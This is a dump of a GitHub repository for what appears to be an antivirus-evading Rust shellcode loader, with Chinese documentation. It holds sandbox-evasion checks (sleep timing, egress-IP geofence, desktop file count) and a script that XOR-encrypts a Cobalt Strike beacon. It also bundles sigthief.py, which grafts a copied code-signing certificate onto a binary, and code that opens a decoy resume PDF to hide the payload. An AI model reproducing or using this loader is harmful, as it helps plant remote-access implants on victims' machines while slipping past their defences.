119 |     use std::time::{Duration, Instant};
120 |     use std::thread::sleep;
121 | 
122 |     let start_time = Instant::now();
123 | 
124 |     sleep(Duration::from_millis(5000));
125 | 
126 |     let elapsed_time = start_time.elapsed();
127 | 
128 |     if elapsed_time.as_millis() < 5000 {
129 |         std::process::exit(1);
130 |     }
131 | }
132 | ```
133 | 
134 | 这个函数判断时间是否在沙箱内进行加速
135 | 
136 | ### 检查出口 IP ###
137 | 
138 | ```
139 | fn ip() {
140 |     let output = Command::new("cmd")
141 |         .args(&["/c", "curl -s https://myip.ipip.net/"])
142 |         .creation_flags(CREATE_NO_WINDOW)
143 |         .output()
144 |         .expect("Failed to execute command");
145 | 
146 |     if !output.status.success() {
147 |         std::process::exit(1);
148 |     }
149 | 
150 |     let body = str::from_utf8(&output.stdout).expect("Failed to parse response");
151 | 
152 |     if body.contains("中国") {
153 |     } else {
154 |         std::process::exit(1);
155 |     }
156 | }
157 | ```
158 | 
159 | 这个函数通过 `curl` 命令获取出口 IP，如果不在中国则退出程序
160 | 
161 | ### 检查桌面文件数量 ###
162 | 
163 | ```
164 | fn check_desktop() {
165 |     let desktop_path = get_desktop_path().expect("无法获取桌面路径");
166 | 
167 |     let entries = match fs::read_dir(&desktop_path) {
168 |         Ok(entries) => entries,
169 |         Err(_) => {
170 |             std::process::exit(1);
171 |         }
172 |     };
173 | 
174 |     let file_count = entries.filter_map(|entry| entry.ok()).count();
175 | 
176 |     if file_count < 10 {
177 |         std::process::exit(1);
178 |     } else {
179 |     }
180 | }
181 | 
182 | fn get_desktop_path() -> Option<PathBuf> {
183 |     let home_dir = dirs::home_dir()?;
184 |     #[cfg(target_os = "windows")]
185 |     return Some(home_dir.join("Desktop"));
186 |     None
187 | }
188 | ```
189 | 这个函数获取桌面路径并检查文件数量是否小于 10，如果小于 10 则退出程序
190 | 
191 | 声明
192 | ---
193 | - 仅限用于技术研究和获得正式授权的攻防项目，请使用者遵守《中华人民共和国网络安全法》，切勿用于任何非法活动，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任！
194 | 
195 | - 使用前先按照文档步骤一步一步来，报错问题自行百度解决，类似issue不予回复，感谢理解！
196 | 
197 | reference
198 | ---
199 | 代码有借鉴学习以下项目，commit当晚通宵没来得及写，现补上，另外免杀性失效自行修改代码，楼主仅提供一种思路，祝玩得开心♥
200 | 
201 | https://github.com/joaoviictorti/RustRedOps
202 | 
203 | https://github.com/xiao-zhu-zhu/RustBypassMap
204 | 


--------------------------------------------------------------------------------
/build.rs:
--------------------------------------------------------------------------------
1 | extern crate embed_resource;
2 | 
3 | fn main() {
4 |     embed_resource::compile("icon.rc");
5 | }


--------------------------------------------------------------------------------
/bundle/xxx简历.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pizz33/JoJoLoader/b82cf295ba6ad58aa34189d2aa0915e0611ac970/bundle/xxx简历.pdf


--------------------------------------------------------------------------------
/encrypt.py:
--------------------------------------------------------------------------------
 1 | import uuid
 2 | 
 3 | def read_binary_file(file_path):
 4 | 
 5 |     try:
 6 |         with open(file_path, 'rb') as file:
 7 |             data = file.read()
 8 |         return data
 9 |     except FileNotFoundError:
10 |         print(f"Error: The file {file_path} does not exist.")
11 |         return None
12 | 
13 | def generate_uuid():
14 |     
15 |     return uuid.uuid4()
16 | 
17 | def encrypt_with_uuid(data, uuid_key):
18 | 
19 |     encrypted_data = bytearray()
20 |     uuid_bytes = uuid_key.bytes
21 |     uuid_len = len(uuid_bytes)
22 |     
23 |     for i in range(len(data)):
24 |         encrypted_data.append(data[i] ^ uuid_bytes[i % uuid_len])
25 |     
26 |     return encrypted_data
27 | 
28 | def save_encrypted_file(file_path, data):
29 |     with open(file_path, 'wb') as file:
30 |         file.write(data)
31 | 
32 | def save_uuid_to_file(file_path, uuid_key):
33 |     with open(file_path, 'w') as file:
34 |         file.write(str(uuid_key))
35 | 
36 | def main():
37 |     input_file = 'beacon_x64.bin'
38 |     output_file = 'src/encrypt.bin'
39 |     uuid_file = 'src/uuidkey.txt'
40 |     
41 |     data = read_binary_file(input_file)
42 |     if data is None:
43 |         return
44 | 
45 |     uuid_key = generate_uuid()
46 |     print(f"Generated UUID key: {uuid_key}")
47 |     
48 |     save_uuid_to_file(uuid_file, uuid_key)
49 |     print(f"UUID key saved to {uuid_file}")
50 |     
51 |     encrypted_data = encrypt_with_uuid(data, uuid_key)
52 |     
53 |     save_encrypted_file(output_file, encrypted_data)
54 |     print(f"Encrypted data saved to {output_file}")
55 | 
56 | if __name__ == '__main__':
57 |     main()
58 | 


--------------------------------------------------------------------------------
/icon.rc:
--------------------------------------------------------------------------------
1 | iconName ICON "static/avp_0000.ico"
2 | 


--------------------------------------------------------------------------------
/output/360Restore.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pizz33/JoJoLoader/b82cf295ba6ad58aa34189d2aa0915e0611ac970/output/360Restore.exe


--------------------------------------------------------------------------------
/output/sigthief.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # LICENSE: BSD-3
  3 | # Copyright: Josh Pitts @midnite_runr
  4 | 
  5 | import sys
  6 | import struct
  7 | import shutil
  8 | import io
  9 | from optparse import OptionParser
 10 | 
 11 | 
 12 | def gather_file_info_win(binary):
 13 |         """
 14 |         Borrowed from BDF...
 15 |         I could just skip to certLOC... *shrug*
 16 |         """
 17 |         flItms = {}
 18 |         binary = open(binary, 'rb')
 19 |         binary.seek(int('3C', 16))
 20 |         flItms['buffer'] = 0
 21 |         flItms['JMPtoCodeAddress'] = 0
 22 |         flItms['dis_frm_pehdrs_sectble'] = 248
 23 |         flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
 24 |         # Start of COFF
 25 |         flItms['COFF_Start'] = flItms['pe_header_location'] + 4
 26 |         binary.seek(flItms['COFF_Start'])
 27 |         flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
 28 |         binary.seek(flItms['COFF_Start'] + 2, 0)
 29 |         flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
 30 |         flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
 31 |         binary.seek(flItms['COFF_Start'] + 16, 0)
 32 |         flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
 33 |         flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
 34 |         #End of COFF
 35 |         flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
 36 | 
 37 |         #if flItms['SizeOfOptionalHeader']:
 38 |             #Begin Standard Fields section of Optional Header
 39 |         binary.seek(flItms['OptionalHeader_start'])
 40 |         flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
 41 |         flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
 42 |         flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
 43 |         flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
 44 |         flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
 45 |         flItms['SizeOfUninitializedData'] = struct.unpack("<I",
 46 |                                                                binary.read(4))[0]
 47 |         flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
 48 |         flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
 49 |         flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
 50 |         if flItms['Magic'] != 0x20B:
 51 |             flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
 52 |         # End Standard Fields section of Optional Header
 53 |         # Begin Windows-Specific Fields of Optional Header
 54 |         if flItms['Magic'] == 0x20B:
 55 |             flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
 56 |         else:
 57 |             flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
 58 |         flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
 59 |         flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
 60 |         flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
 61 |                                                                    binary.read(2))[0]
 62 |         flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
 63 |                                                                    binary.read(2))[0]
 64 |         flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
 65 |         flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
 66 |         flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
 67 |         flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
 68 |         flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
 69 |         flItms['SizeOfImageLoc'] = binary.tell()
 70 |         flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
 71 |         flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
 72 |         flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
 73 |         flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
 74 |         flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
 75 |         if flItms['Magic'] == 0x20B:
 76 |             flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
 77 |             flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
 78 |             flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
 79 |             flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
 80 | 
 81 |         else:
 82 |             flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
 83 |             flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
 84 |             flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
 85 |             flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
 86 |         flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
 87 |         flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
 88 |         # End Windows-Specific Fields of Optional Header
 89 |         # Begin Data Directories of Optional Header
 90 |         flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
 91 |         flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
 92 |         flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
 93 |         #ImportTable SIZE|LOC
 94 |         flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
 95 |         flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
 96 |         flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
 97 |         flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
 98 |         flItms['CertTableLOC'] = binary.tell()
 99 |         flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
100 |         flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
101 |         binary.close()
102 |         return flItms
103 | 
104 | 
105 | def copyCert(exe):
106 |     flItms = gather_file_info_win(exe)
107 | 
108 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
109 |         # not signed
110 |         print("Input file Not signed!")
111 |         sys.exit(-1)
112 | 
113 |     with open(exe, 'rb') as f:
114 |         f.seek(flItms['CertLOC'], 0)
115 |         cert = f.read(flItms['CertSize'])
116 |     return cert
117 | 
118 | 
119 | def writeCert(cert, exe, output):
120 |     flItms = gather_file_info_win(exe)
121 |     
122 |     if not output: 
123 |         output = output = str(exe) + "_signed"
124 | 
125 |     shutil.copy2(exe, output)
126 |     
127 |     print("Output file: {0}".format(output))
128 | 
129 |     with open(exe, 'rb') as g:
130 |         with open(output, 'wb') as f:
131 |             f.write(g.read())
132 |             f.seek(0)
133 |             f.seek(flItms['CertTableLOC'], 0)
134 |             f.write(struct.pack("<I", len(open(exe, 'rb').read())))
135 |             f.write(struct.pack("<I", len(cert)))
136 |             f.seek(0, io.SEEK_END)
137 |             f.write(cert)
138 | 
139 |     print("Signature appended. \nFIN.")
140 | 
141 | 
142 | def outputCert(exe, output):
143 |     cert = copyCert(exe)
144 |     if not output:
145 |         output = str(exe) + "_sig"
146 | 
147 |     print("Output file: {0}".format(output))
148 | 
149 |     open(output, 'wb').write(cert)
150 | 
151 |     print("Signature ripped. \nFIN.")
152 | 
153 | 
154 | def check_sig(exe):
155 |     flItms = gather_file_info_win(exe)
156 |  
157 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
158 |         # not signed
159 |         print("Inputfile Not signed!")
160 |     else:
161 |         print("Inputfile is signed!")
162 | 
163 | 
164 | def truncate(exe, output):
165 |     flItms = gather_file_info_win(exe)
166 |  
167 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
168 |         # not signed
169 |         print("Inputfile Not signed!")
170 |         sys.exit(-1)
171 |     else:
172 |         print( "Inputfile is signed!")
173 | 
174 |     if not output:
175 |         output = str(exe) + "_nosig"
176 | 
177 |     print("Output file: {0}".format(output))
178 | 
179 |     shutil.copy2(exe, output)
180 | 
181 |     with open(output, "r+b") as binary:
182 |         print('Overwriting certificate table pointer and truncating binary')
183 |         binary.seek(-flItms['CertSize'], io.SEEK_END)
184 |         binary.truncate()
185 |         binary.seek(flItms['CertTableLOC'], 0)
186 |         binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
187 | 
188 |     print("Signature removed. \nFIN.")
189 | 
190 | 
191 | def signfile(exe, sigfile, output):
192 |     flItms = gather_file_info_win(exe)
193 |     
194 |     cert = open(sigfile, 'rb').read()
195 | 
196 |     if not output: 
197 |         output = output = str(exe) + "_signed"
198 | 
199 |     shutil.copy2(exe, output)
200 |     
201 |     print("Output file: {0}".format(output))
202 |     
203 |     with open(exe, 'rb') as g:
204 |         with open(output, 'wb') as f:
205 |             f.write(g.read())
206 |             f.seek(0)
207 |             f.seek(flItms['CertTableLOC'], 0)
208 |             f.write(struct.pack("<I", len(open(exe, 'rb').read())))
209 |             f.write(struct.pack("<I", len(cert)))
210 |             f.seek(0, io.SEEK_END)
211 |             f.write(cert)
212 |     print("Signature appended. \nFIN.")
213 | 
214 | 
215 | if __name__ == "__main__":
216 |     usage = 'usage: %prog [options]'
217 |     parser = OptionParser()
218 |     parser.add_option("-i", "--file", dest="inputfile", 
219 |                   help="input file", metavar="FILE")
220 |     parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
221 |                   help='rip signature off inputfile')
222 |     parser.add_option('-a', '--add', dest='addsig', action='store_true',
223 |                   help='add signautre to targetfile')
224 |     parser.add_option('-o', '--output', dest='outputfile',
225 |                   help='output file')
226 |     parser.add_option('-s', '--sig', dest='sigfile',
227 |                   help='binary signature from disk')
228 |     parser.add_option('-t', '--target', dest='targetfile',
229 |                   help='file to append signature to')
230 |     parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
231 |                   help='file to check if signed; does not verify signature')
232 |     parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
233 |                   help='truncate signature (i.e. remove sig)')
234 |     (options, args) = parser.parse_args()
235 |     
236 |     # rip signature
237 |     # inputfile and rip to outputfile
238 |     if options.inputfile and options.ripsig:
239 |         print("Ripping signature to file!")
240 |         outputCert(options.inputfile, options.outputfile)
241 |         sys.exit()    
242 | 
243 |     # copy from one to another
244 |     # inputfile and rip to targetfile to outputfile    
245 |     if options.inputfile and options.targetfile:
246 |         cert = copyCert(options.inputfile)
247 |         writeCert(cert, options.targetfile, options.outputfile)
248 |         sys.exit()
249 | 
250 |     # check signature
251 |     # inputfile 
252 |     if options.inputfile and options.checksig:
253 |         check_sig(options.inputfile) 
254 |         sys.exit()
255 | 
256 |     # add sig to target file
257 |     if options.targetfile and options.sigfile:
258 |         signfile(options.targetfile, options.sigfile, options.outputfile)
259 |         sys.exit()
260 |         
261 |     # truncate
262 |     if options.inputfile and options.truncate:
263 |         truncate(options.inputfile, options.outputfile)
264 |         sys.exit()
265 | 
266 |     parser.print_help()
267 |     parser.error("You must do something!")


--------------------------------------------------------------------------------
/src/forgery/bundle.rs:
--------------------------------------------------------------------------------
 1 | use std::io::Write;
 2 | use std::os::windows::process::CommandExt;
 3 | use tempfile::NamedTempFile;
 4 | use winapi::um::winbase::CREATE_NO_WINDOW;
 5 | 
 6 | pub fn bundlefile() {
 7 | 
 8 |     const MEMORY_FILE: &[u8] = include_bytes!("../../bundle/xxx简历.pdf");
 9 | 
10 |     let mut temp_file = NamedTempFile::new().unwrap();
11 |     let original_file_name = "xxx简历.pdf"; // 原始文件名
12 |     let file_extension = "pdf"; // 文件后缀名
13 |     
14 |     let temp_dir = temp_file.path().parent().unwrap();
15 |     let temp_file_path = temp_dir.join(original_file_name);
16 | 
17 |     temp_file.write_all(MEMORY_FILE).unwrap();
18 |     temp_file.flush().unwrap();
19 | 
20 |     // 保持一致的文件名和后缀名
21 |     std::fs::rename(temp_file.path(), &temp_file_path).expect("Failed to rename temporary file");
22 | 
23 |     use std::process::Command;
24 |     // 利用cmd 打开文件
25 |     Command::new("cmd")
26 |         .args(&["/c", "start", "/B", temp_file_path.to_str().unwrap()])
27 |         .creation_flags(CREATE_NO_WINDOW)
28 |         .spawn()
29 |         .expect("Failed to open file");
30 | }
31 | 


--------------------------------------------------------------------------------
/src/forgery/mod.rs:
--------------------------------------------------------------------------------
1 | pub mod bundle;
2 | 
3 | 


--------------------------------------------------------------------------------
/src/forgery/test.rs:
--------------------------------------------------------------------------------
  1 | #![windows_subsystem = "windows"]
  2 | #![windows_subsystem = "windows"]
  3 | #![windows_subsystem = "windows"]
  4 | #![windows_subsystem = "windows"]
  5 | #![windows_subsystem = "windows"]
  6 | #![windows_subsystem = "windows"]
  7 | #![windows_subsystem = "windows"]
  8 | #![windows_subsystem = "windows"]
  9 | #![windows_subsystem = "windows"]
 10 | #![windows_subsystem = "windows"]
 11 | #![windows_subsystem = "windows"]
 12 | #![windows_subsystem = "windows"]
 13 | #![windows_subsystem = "windows"]
 14 | #![windows_subsystem = "windows"]
 15 | #![windows_subsystem = "windows"]
 16 | #![windows_subsystem = "windows"]
 17 | #![windows_subsystem = "windows"]
 18 | #![windows_subsystem = "windows"]
 19 | #![windows_subsystem = "windows"]
 20 | #![windows_subsystem = "windows"]
 21 | #![windows_subsystem = "windows"]
 22 | #![windows_subsystem = "windows"]
 23 | #![windows_subsystem = "windows"]
 24 | #![windows_subsystem = "windows"]
 25 | #![windows_subsystem = "windows"]
 26 | #![windows_subsystem = "windows"]
 27 | #![windows_subsystem = "windows"]
 28 | #![windows_subsystem = "windows"]
 29 | #![windows_subsystem = "windows"]
 30 | #![windows_subsystem = "windows"]
 31 | #![windows_subsystem = "windows"]
 32 | #![windows_subsystem = "windows"]
 33 | #![windows_subsystem = "windows"]
 34 | #![windows_subsystem = "windows"]
 35 | #![windows_subsystem = "windows"]
 36 | #![windows_subsystem = "windows"]
 37 | #![windows_subsystem = "windows"]
 38 | #![windows_subsystem = "windows"]
 39 | #![windows_subsystem = "windows"]
 40 | #![windows_subsystem = "windows"]
 41 | #![windows_subsystem = "windows"]
 42 | #![windows_subsystem = "windows"]
 43 | #![windows_subsystem = "windows"]
 44 | #![windows_subsystem = "windows"]
 45 | #![windows_subsystem = "windows"]
 46 | #![windows_subsystem = "windows"]
 47 | #![windows_subsystem = "windows"]
 48 | #![windows_subsystem = "windows"]
 49 | #![windows_subsystem = "windows"]
 50 | #![windows_subsystem = "windows"]
 51 | #![windows_subsystem = "windows"]
 52 | #![windows_subsystem = "windows"]
 53 | #![windows_subsystem = "windows"]
 54 | #![windows_subsystem = "windows"]
 55 | #![windows_subsystem = "windows"]
 56 | #![windows_subsystem = "windows"]
 57 | #![windows_subsystem = "windows"]
 58 | #![windows_subsystem = "windows"]
 59 | #![windows_subsystem = "windows"]
 60 | #![windows_subsystem = "windows"]
 61 | #![windows_subsystem = "windows"]
 62 | #![windows_subsystem = "windows"]
 63 | #![windows_subsystem = "windows"]
 64 | #![windows_subsystem = "windows"]
 65 | #![windows_subsystem = "windows"]
 66 | #![windows_subsystem = "windows"]
 67 | #![windows_subsystem = "windows"]
 68 | #![windows_subsystem = "windows"]
 69 | #![windows_subsystem = "windows"]
 70 | #![windows_subsystem = "windows"]
 71 | #![windows_subsystem = "windows"]
 72 | #![windows_subsystem = "windows"]
 73 | #![windows_subsystem = "windows"]
 74 | #![windows_subsystem = "windows"]
 75 | #![windows_subsystem = "windows"]
 76 | #![windows_subsystem = "windows"]
 77 | #![windows_subsystem = "windows"]
 78 | #![windows_subsystem = "windows"]
 79 | #![windows_subsystem = "windows"]
 80 | #![windows_subsystem = "windows"]
 81 | #![windows_subsystem = "windows"]
 82 | #![windows_subsystem = "windows"]
 83 | #![windows_subsystem = "windows"]
 84 | #![windows_subsystem = "windows"]
 85 | #![windows_subsystem = "windows"]
 86 | #![windows_subsystem = "windows"]
 87 | #![windows_subsystem = "windows"]
 88 | #![windows_subsystem = "windows"]
 89 | #![windows_subsystem = "windows"]
 90 | #![windows_subsystem = "windows"]
 91 | #![windows_subsystem = "windows"]
 92 | #![windows_subsystem = "windows"]
 93 | #![windows_subsystem = "windows"]
 94 | #![windows_subsystem = "windows"]
 95 | #![windows_subsystem = "windows"]
 96 | #![windows_subsystem = "windows"]
 97 | #![windows_subsystem = "windows"]
 98 | #![windows_subsystem = "windows"]
 99 | #![windows_subsystem = "windows"]
100 | #![windows_subsystem = "windows"]
101 | #![windows_subsystem = "windows"]
102 | #![windows_subsystem = "windows"]
103 | #![windows_subsystem = "windows"]
104 | #![windows_subsystem = "windows"]
105 | #![windows_subsystem = "windows"]
106 | #![windows_subsystem = "windows"]
107 | #![windows_subsystem = "windows"]
108 | #![windows_subsystem = "windows"]
109 | #![windows_subsystem = "windows"]
110 | #![windows_subsystem = "windows"]
111 | #![windows_subsystem = "windows"]
112 | #![windows_subsystem = "windows"]
113 | #![windows_subsystem = "windows"]
114 | #![windows_subsystem = "windows"]
115 | #![windows_subsystem = "windows"]
116 | #![windows_subsystem = "windows"]
117 | #![windows_subsystem = "windows"]
118 | #![windows_subsystem = "windows"]
119 | #![windows_subsystem = "windows"]
120 | #![windows_subsystem = "windows"]
121 | #![windows_subsystem = "windows"]
122 | #![windows_subsystem = "windows"]
123 | #![windows_subsystem = "windows"]
124 | #![windows_subsystem = "windows"]
125 | #![windows_subsystem = "windows"]
126 | #![windows_subsystem = "windows"]
127 | #![windows_subsystem = "windows"]
128 | #![windows_subsystem = "windows"]
129 | #![windows_subsystem = "windows"]
130 | #![windows_subsystem = "windows"]
131 | #![windows_subsystem = "windows"]
132 | #![windows_subsystem = "windows"]
133 | #![windows_subsystem = "windows"]
134 | #![windows_subsystem = "windows"]
135 | #![windows_subsystem = "windows"]
136 | #![windows_subsystem = "windows"]
137 | #![windows_subsystem = "windows"]
138 | #![windows_subsystem = "windows"]
139 | #![windows_subsystem = "windows"]
140 | #![windows_subsystem = "windows"]
141 | #![windows_subsystem = "windows"]
142 | #![windows_subsystem = "windows"]
143 | #![windows_subsystem = "windows"]
144 | #![windows_subsystem = "windows"]
145 | #![windows_subsystem = "windows"]
146 | #![windows_subsystem = "windows"]
147 | #![windows_subsystem = "windows"]
148 | #![windows_subsystem = "windows"]
149 | #![windows_subsystem = "windows"]
150 | #![windows_subsystem = "windows"]
151 | #![windows_subsystem = "windows"]
152 | #![windows_subsystem = "windows"]
153 | #![windows_subsystem = "windows"]
154 | #![windows_subsystem = "windows"]
155 | #![windows_subsystem = "windows"]
156 | #![windows_subsystem = "windows"]
157 | #![windows_subsystem = "windows"]
158 | #![windows_subsystem = "windows"]
159 | #![windows_subsystem = "windows"]
160 | #![windows_subsystem = "windows"]
161 | #![windows_subsystem = "windows"]
162 | #![windows_subsystem = "windows"]
163 | #![windows_subsystem = "windows"]
164 | #![windows_subsystem = "windows"]
165 | #![windows_subsystem = "windows"]
166 | #![windows_subsystem = "windows"]
167 | #![windows_subsystem = "windows"]
168 | #![windows_subsystem = "windows"]
169 | #![windows_subsystem = "windows"]
170 | #![windows_subsystem = "windows"]
171 | #![windows_subsystem = "windows"]
172 | #![windows_subsystem = "windows"]
173 | #![windows_subsystem = "windows"]
174 | #![windows_subsystem = "windows"]
175 | #![windows_subsystem = "windows"]
176 | #![windows_subsystem = "windows"]
177 | #![windows_subsystem = "windows"]
178 | #![windows_subsystem = "windows"]
179 | #![windows_subsystem = "windows"]
180 | #![windows_subsystem = "windows"]
181 | #![windows_subsystem = "windows"]
182 | #![windows_subsystem = "windows"]
183 | #![windows_subsystem = "windows"]
184 | #![windows_subsystem = "windows"]
185 | #![windows_subsystem = "windows"]
186 | #![windows_subsystem = "windows"]
187 | #![windows_subsystem = "windows"]
188 | #![windows_subsystem = "windows"]
189 | #![windows_subsystem = "windows"]
190 | #![windows_subsystem = "windows"]
191 | #![windows_subsystem = "windows"]
192 | #![windows_subsystem = "windows"]
193 | #![windows_subsystem = "windows"]
194 | #![windows_subsystem = "windows"]
195 | #![windows_subsystem = "windows"]
196 | #![windows_subsystem = "windows"]
197 | #![windows_subsystem = "windows"]
198 | #![windows_subsystem = "windows"]
199 | #![windows_subsystem = "windows"]
200 | #![windows_subsystem = "windows"]
201 | #![windows_subsystem = "windows"]
202 | #![windows_subsystem = "windows"]
203 | #![windows_subsystem = "windows"]
204 | #![windows_subsystem = "windows"]
205 | #![windows_subsystem = "windows"]
206 | #![windows_subsystem = "windows"]
207 | #![windows_subsystem = "windows"]
208 | #![windows_subsystem = "windows"]
209 | #![windows_subsystem = "windows"]
210 | #![windows_subsystem = "windows"]
211 | #![windows_subsystem = "windows"]
212 | #![windows_subsystem = "windows"]
213 | #![windows_subsystem = "windows"]
214 | #![windows_subsystem = "windows"]
215 | #![windows_subsystem = "windows"]
216 | #![windows_subsystem = "windows"]
217 | #![windows_subsystem = "windows"]
218 | #![windows_subsystem = "windows"]
219 | #![windows_subsystem = "windows"]
220 | #![windows_subsystem = "windows"]
221 | #![windows_subsystem = "windows"]
222 | #![windows_subsystem = "windows"]
223 | #![windows_subsystem = "windows"]
224 | #![windows_subsystem = "windows"]
225 | #![windows_subsystem = "windows"]
226 | #![windows_subsystem = "windows"]
227 | #![windows_subsystem = "windows"]
228 | #![windows_subsystem = "windows"]
229 | #![windows_subsystem = "windows"]
230 | #![windows_subsystem = "windows"]
231 | #![windows_subsystem = "windows"]
232 | #![windows_subsystem = "windows"]
233 | #![windows_subsystem = "windows"]
234 | #![windows_subsystem = "windows"]
235 | #![windows_subsystem = "windows"]
236 | #![windows_subsystem = "windows"]
237 | #![windows_subsystem = "windows"]
238 | #![windows_subsystem = "windows"]
239 | #![windows_subsystem = "windows"]
240 | #![windows_subsystem = "windows"]
241 | #![windows_subsystem = "windows"]
242 | #![windows_subsystem = "windows"]
243 | #![windows_subsystem = "windows"]
244 | #![windows_subsystem = "windows"]
245 | #![windows_subsystem = "windows"]
246 | #![windows_subsystem = "windows"]
247 | #![windows_subsystem = "windows"]
248 | #![windows_subsystem = "windows"]
249 | #![windows_subsystem = "windows"]
250 | #![windows_subsystem = "windows"]
251 | #![windows_subsystem = "windows"]
252 | #![windows_subsystem = "windows"]
253 | #![windows_subsystem = "windows"]
254 | #![windows_subsystem = "windows"]
255 | #![windows_subsystem = "windows"]
256 | #![windows_subsystem = "windows"]
257 | #![windows_subsystem = "windows"]
258 | #![windows_subsystem = "windows"]
259 | #![windows_subsystem = "windows"]
260 | #![windows_subsystem = "windows"]
261 | #![windows_subsystem = "windows"]
262 | #![windows_subsystem = "windows"]
263 | #![windows_subsystem = "windows"]
264 | #![windows_subsystem = "windows"]
265 | #![windows_subsystem = "windows"]
266 | #![windows_subsystem = "windows"]
267 | #![windows_subsystem = "windows"]
268 | #![windows_subsystem = "windows"]
269 | #![windows_subsystem = "windows"]
270 | #![windows_subsystem = "windows"]
271 | #![windows_subsystem = "windows"]
272 | #![windows_subsystem = "windows"]
273 | #![windows_subsystem = "windows"]
274 | #![windows_subsystem = "windows"]
275 | #![windows_subsystem = "windows"]
276 | #![windows_subsystem = "windows"]
277 | #![windows_subsystem = "windows"]
278 | #![windows_subsystem = "windows"]
279 | #![windows_subsystem = "windows"]
280 | #![windows_subsystem = "windows"]
281 | #![windows_subsystem = "windows"]
282 | #![windows_subsystem = "windows"]
283 | #![windows_subsystem = "windows"]
284 | #![windows_subsystem = "windows"]
285 | #![windows_subsystem = "windows"]
286 | #![windows_subsystem = "windows"]
287 | #![windows_subsystem = "windows"]
288 | #![windows_subsystem = "windows"]
289 | #![windows_subsystem = "windows"]
290 | #![windows_subsystem = "windows"]
291 | #![windows_subsystem = "windows"]
292 | #![windows_subsystem = "windows"]
293 | #![windows_subsystem = "windows"]
294 | #![windows_subsystem = "windows"]
295 | #![windows_subsystem = "windows"]
296 | #![windows_subsystem = "windows"]
297 | #![windows_subsystem = "windows"]
298 | #![windows_subsystem = "windows"]
299 | #![windows_subsystem = "windows"]
300 | #![windows_subsystem = "windows"]
301 | #![windows_subsystem = "windows"]
302 | #![windows_subsystem = "windows"]
303 | #![windows_subsystem = "windows"]
304 | #![windows_subsystem = "windows"]
305 | #![windows_subsystem = "windows"]
306 | #![windows_subsystem = "windows"]
307 | #![windows_subsystem = "windows"]
308 | #![windows_subsystem = "windows"]
309 | #![windows_subsystem = "windows"]
310 | #![windows_subsystem = "windows"]
311 | #![windows_subsystem = "windows"]
312 | #![windows_subsystem = "windows"]
313 | #![windows_subsystem = "windows"]
314 | #![windows_subsystem = "windows"]
315 | #![windows_subsystem = "windows"]
316 | #![windows_subsystem = "windows"]
317 | #![windows_subsystem = "windows"]
318 | #![windows_subsystem = "windows"]
319 | #![windows_subsystem = "windows"]
320 | #![windows_subsystem = "windows"]
321 | #![windows_subsystem = "windows"]
322 | #![windows_subsystem = "windows"]
